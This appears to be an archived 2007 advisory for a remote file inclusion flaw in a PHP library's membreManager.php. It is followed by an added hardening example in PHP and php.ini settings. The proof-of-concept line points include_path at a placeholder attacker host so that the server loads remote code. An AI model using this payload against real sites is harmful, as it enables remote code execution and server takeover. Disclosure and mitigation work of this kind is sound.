
# Title : PhP Generic library & framework (include_path) RFI Vulnerability
# Published : 2007-01-28
# Author : xoron


-----------------------------------------------

PhP Generic library & framework (include_path) Remote File Include Exploit

-----------------------------------------------

Author: xoron

xoron.biz

-----------------------------------------------

Code:

require $GLOBALS[include_path]."configmember.php";
require $GLOBALS[include_path]."inc-membreManager.php";

-----------------------------------------------

POC:

www.[target].com/[script_path]/membres/membreManager.php?include_path=http://evilscripts?
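
Hardened form of the two require lines above, as an added example that is not part of the original advisory and not the project's own code. It assumes register_globals is what lets the query string set $GLOBALS[include_path]; the helper name resolve_include and the directory layout are hypothetical.

```php
<?php
// Added example, not the project's code. Hardened form of the two require
// lines in membres/membreManager.php: the base directory is fixed in code and
// never read from $GLOBALS, which register_globals lets a request populate.

// Hypothetical helper. Returns the absolute path of an allowlisted include
// file that really lives directly under $baseDir, or throws.
function resolve_include(string $baseDir, string $file): string
{
    $allowed = ['configmember.php', 'inc-membreManager.php'];
    if (!in_array($file, $allowed, true)) {
        throw new RuntimeException("include not allowlisted: $file");
    }
    // realpath() does not follow URL wrappers, so http://... resolves to false.
    $base = realpath($baseDir);
    if ($base === false || !is_dir($base)) {
        throw new RuntimeException("base directory is not a local path");
    }
    $full = realpath($base . DIRECTORY_SEPARATOR . $file);
    if ($full === false || dirname($full) !== $base) {
        throw new RuntimeException("include escapes base directory: $file");
    }
    return $full;
}

// Constructed demo: a throwaway include directory holding the two files.
$dir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'rfi_demo_' . getmypid();
@mkdir($dir);
file_put_contents("$dir/configmember.php", "<?php // constructed stub\n");
file_put_contents("$dir/inc-membreManager.php", "<?php // constructed stub\n");

// In the real script the base would be a code-level constant such as
// __DIR__ . '/../include' (layout is an assumption), not request data.
require resolve_include($dir, 'configmember.php');
require resolve_include($dir, 'inc-membreManager.php');
echo "local includes loaded\n";

// The include_path value from the POC request is rejected, not fetched.
try {
    resolve_include('http://evilscripts?', 'configmember.php');
} catch (RuntimeException $e) {
    echo "rejected: ", $e->getMessage(), "\n";
}
```

Setting register_globals = Off and allow_url_include = Off in php.ini closes the same path at the configuration level.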

-----------------------------------------------

download: http://sourceforge.net/project/showfiles.php?group_id=72529

-----------------------------------------------

xoron leaves, his mark remains. Farewell.

xoron, a kid addicted to losing.

-----------------------------------------------

# www.Syue.com [2007-01-28]